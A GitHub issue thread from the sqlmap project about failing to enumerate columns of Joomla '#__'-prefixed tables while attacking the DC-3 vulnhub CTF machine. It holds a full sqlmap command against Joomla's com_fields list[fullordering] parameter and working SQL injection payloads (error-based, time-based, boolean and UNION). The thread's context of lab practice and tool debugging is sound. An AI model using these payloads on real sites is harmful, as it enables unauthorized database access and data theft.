### ISSUE TITLE
Problem retrieving data from a table named #__table 

### ISSUE THREAD

**Issue by chrjoh** [sqlmapproject/sqlmap#3989]
**Describe the bug**
Testing to do some CTF, (DC-3) from vulnhub, it is a joomla setup and the tables begin with #__
(using an osx machine with sqlmap installed with brew sqlmap version 1.3.10)

**To Reproduce**
Download DC-3 as vm in virtualbox
sqlmap -u "http://dc-3/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --schema
want a schema dump, and get the tables but the columns can't be fetched
Results:
Parameter: list[fullordering] (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT (CASE WHEN (6206=6206) THEN 0x757064617465786d6c ELSE (SELECT 8483 UNION SELECT 3513) END))

    Type: error-based
    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(1491,CONCAT(0x2e,0x7178787171,(SELECT (ELT(1491=1491,1))),0x7176627171),3836))

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 4430 FROM (SELECT(SLEEP(5)))RxSE)

enumerating database management system schema
fetching tables for database: 'joomladb'
used SQL query returns 91 entries
fetched tables: joomladb.#__update_sites, joomladb.#__content_frontpag, joomladb.#__ucm_history, joomladb.#__bsms_servers, joomladb.#__finder_filters, joomladb.#__finder_tokens_ag, joomladb.#__fields_values, joomladb.#__banners, joomladb.#__extensions, joomladb.#__usergroups, joomladb.#__fields_categorie, joomladb.#__modules_menu, joomladb.#__overrider, joomladb.#__messages_cfg, joomladb.#__bsms_templates, joomladb.#__menu_types, joomladb.#__content_types, joomladb.#__bsms_teachers, joomladb.#__fields, joomladb.#__core_log_searche, joomladb.#__finder_types, joomladb.#__bsms_mediafiles, joomladb.#__finder_terms, joomladb.#__jbspodcast_times, joomladb.#__session, joomladb.#__fields_groups, joomladb.#__tags, joomladb.#__associations, joomladb.#__user_profiles, joomladb.#__viewlevels, joomladb.#__bsms_topics, joomladb.#__finder_tokens, joomladb.#__content_rating, joomladb.#__users, joomladb.#__finder_links, joomladb.#__modules, joomladb.#__ucm_content, joomladb.#__user_notes, joomladb.#__bsms_templatecod, joomladb.#__bsms_series, joomladb.#__bsms_comments, joomladb.#__utf8_conversion, joomladb.#__assets, joomladb.#__banner_clients, joomladb.#__finder_taxonomy_, joomladb.#__template_styles, joomladb.#__bsms_locations, joomladb.#__redirect_links, joomladb.#__ucm_base, joomladb.#__finder_taxonomy, joomladb.#__schemas, joomladb.#__bsms_studytopics, joomladb.#__categories, joomladb.#__postinstall_mess, joomladb.#__user_usergroup_m, joomladb.#__finder_links_ter, joomladb.#__bsms_timeset, joomladb.#__banner_tracks, joomladb.#__finder_terms_com, joomladb.#__update_sites_ext, joomladb.#__bsms_update, joomladb.#__contact_details, joomladb.#__bsms_admin, joomladb.#__languages, joomladb.#__menu, joomladb.#__bsms_message_typ, joomladb.#__newsfeeds, joomladb.#__bsms_studies, joomladb.#__contentitem_tag_, joomladb.#__user_keys, joomladb.#__bsms_podcast, joomladb.#__updates, joomladb.#__content, joomladb.#__messages, joomladb.#__jbsbackup_timese, joomladb.#__bsms_books

fetching columns for table '#__update_sites' in database 'joomladb'
unable to retrieve column names for table '#__update_sites' in database 'joomladb'
and so forth with all columns

**Expected behavior**
want the column names 

**Running environment:**
 - sqlmap version [e.g. 1.3.10]
 - brew install sqlmap
 - osx 10.14.5
- python version 3.7.4

**Target details:**
 - DBMS mysql
 
**Additional context**
Also tested to clone git master and run the same command with the same result as the one installed with brew

**Comment by stamparm** [comment]
Unable to reproduce:

```
$ python sqlmap.py -u "http://debiandev/sqlmap/mysql/get_int.php?id=1" -z "tec=BEU" -D testdb --schema
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.3.10.27#dev}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:43:25 /2019-10-28/

[12:43:25] [INFO] resuming back-end DBMS 'mysql' 
[12:43:25] [INFO] testing connection to the target URL
[12:43:25] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 2114=2114

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 1184 FROM(SELECT COUNT(*),CONCAT(0x7162707671,(SELECT (ELT(1184=1184,1))),0x7176766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x7162707671,0x654a4d72584e5445724a735a44664e61544b6e586e69457552514d6c41486d6762637a44506a6a42,0x7176766b71)-- ktXc
---
[12:43:25] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL >= 5.0
[12:43:25] [INFO] enumerating database management system schema
[12:43:25] [INFO] fetching tables for database: 'testdb'
...
[12:43:25] [INFO] fetching columns for table '#__foobar' in database 'testdb'
Database: testdb
...
Database: testdb
Table: #__foobar
[1 column]
+--------+---------+
| Column | Type    |
+--------+---------+
| id     | int(11) |
+--------+---------+
...

[12:43:25] [INFO] fetched data logged to text files under '/home/stamparm/.sqlmap/output/debiandev'

[*] ending @ 12:43:25 /2019-10-28/
```

p.s. maybe you have some other (e.g. permissions) problem than the `#` related

**Comment by chrjoh** [comment]
did you run sqlmap from a mac osx machine as I think it works on linux but not osx

**Comment by stamparm** [comment]
but what would be the difference? python is python

**Comment by chrjoh** [comment]
tried with the same vm (DC-4 )in virtual box on my work mac same issue

**Comment by stamparm** [comment]
I said that this could be something totally unrelated to sqlmap. Maybe permission issues at the other side. As said, hashtag is not a problem here

**Comment by DoDDnice6** [comment]
I also got the same error :(

**Comment by stamparm** [comment]
Can anybody debug this on his side and report back with something useful? ::sad face::
